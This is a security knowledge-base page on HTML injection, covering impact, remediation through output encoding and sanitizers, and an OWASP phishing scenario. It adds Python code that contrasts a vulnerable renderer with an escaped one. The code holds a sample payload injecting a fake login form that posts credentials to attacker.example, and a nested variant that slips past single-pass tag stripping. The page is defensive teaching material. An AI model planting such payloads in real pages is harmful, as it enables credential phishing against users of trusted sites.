HTML Injection

Description

This vulnerability occurs when user-supplied input is written into an HTML response without being validated on the way in and without being output-encoded on the way out, so the browser parses attacker-controlled text as markup instead of displaying it as data. It differs from cross-site scripting only in that the injected content need not include script; plain elements such as forms, links, images and iframes are enough to cause harm.

Business Impact

A successful injection lets the attacker place arbitrary HTML into a page served from the application's own, trusted domain. Typical uses are phishing (a fake login form that posts credentials to the attacker's server), defacement, injected links or iframes that redirect users to attacker-controlled sites, and, where script is not blocked, escalation to cross-site scripting.

Recommendation

Encode user-supplied data for the context in which it is emitted (HTML entity encoding for element content, attribute encoding inside attribute values) so the browser treats it as text rather than markup. Validate input against an allow-list wherever the expected format is known. If users legitimately need to supply rich text, pass it through a well-maintained HTML sanitizer that parses the markup and keeps only a safe subset of elements and attributes. Do not rely on removing tag-like substrings from the input with pattern matching: a single stripping pass is easily bypassed, for example by nesting one tag inside another so that the outer tag survives once the inner one is removed. A Content-Security-Policy header that restricts form targets and external resources limits the damage of an injection, but it is a second layer, not a substitute for output encoding.

More Details

OWASP attack scenario

A possible attack scenario is demonstrated below:

1. The attacker discovers an injection vulnerability and decides to use an HTML injection attack.
2. The attacker crafts a malicious link that includes the injected HTML content and sends it to a user via email.
3. The user visits the page because it is located within a trusted domain.
4. The attacker's injected HTML is rendered and presented to the user, asking for a username and password.
5. The user enters a username and password, which are both sent to the attacker's server.
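The reflection described under Description, the output encoding recommended under Recommendation and the fake-login-form scenario above, as an added Python example. This is illustration code written for this page, not code from the original page or from the Kayran scanner. The page template, the function names, the hostname attacker.example and the payloads are constructed for the example; the only library used is Python's standard html module.

```python
import html
import re

# Constructed sample payload: an attacker-supplied "name" value that injects a
# fake login form posting to a host the attacker controls. The hostname
# attacker.example is hypothetical.
PAYLOAD = (
    '<form action="https://attacker.example/collect" method="post">'
    "Session expired, please sign in again:"
    '<input name="user"><input name="pass" type="password">'
    '<input type="submit" value="Sign in"></form>'
)

# Constructed nested variant: once the inner <form> is removed by a single
# stripping pass, the surrounding characters join into a working <form> tag.
NESTED_PAYLOAD = '<fo<form>rm action="https://attacker.example/collect">'

# Constructed page template that reflects a user-supplied value into the body.
PAGE_TEMPLATE = "<html><body><h1>Welcome, {name}</h1></body></html>"


def render_vulnerable(name: str) -> str:
    """Reflects the user-supplied value verbatim into an HTML text context.

    This is the bug the page describes: no validation, no output encoding,
    so the browser parses the value as markup.
    """
    return PAGE_TEMPLATE.format(name=name)


def render_safe(name: str) -> str:
    """Entity-encodes the value before reflecting it.

    html.escape turns <, >, &, " and ' into entities, so the browser shows
    the attacker's form as literal text instead of rendering it.
    """
    return PAGE_TEMPLATE.format(name=html.escape(name, quote=True))


# Single-pass tag stripper of the kind the "remove HTML substrings" advice
# suggests. It is included only to show why encoding is preferred.
TAG_RE = re.compile(r"<[^<>]*>")


def strip_tags_once(value: str) -> str:
    """Removes anything that looks like a tag, in one non-recursive pass."""
    return TAG_RE.sub("", value)


def contains_injected_markup(rendered: str, supplied: str) -> bool:
    """True if the raw supplied string survived into the rendered output."""
    return supplied in rendered


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(PAYLOAD))
    print("encoded:   ", render_safe(PAYLOAD))
    print("stripped plain payload:", strip_tags_once(PAYLOAD))
    print("stripped nested payload:", strip_tags_once(NESTED_PAYLOAD))
```

Running the block shows the three outcomes side by side: the vulnerable renderer emits the attacker's form unchanged, the encoded renderer emits `&lt;form ...` which the browser displays as text, and the stripper removes every tag from the plain payload yet turns the nested payload into a valid `<form action="https://attacker.example/collect">`. That last result is the reason the fix is encoding at the point of output rather than deleting tag-like substrings from the input.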

Reference

https://www.imperva.com/learn/application-security/html-injection/
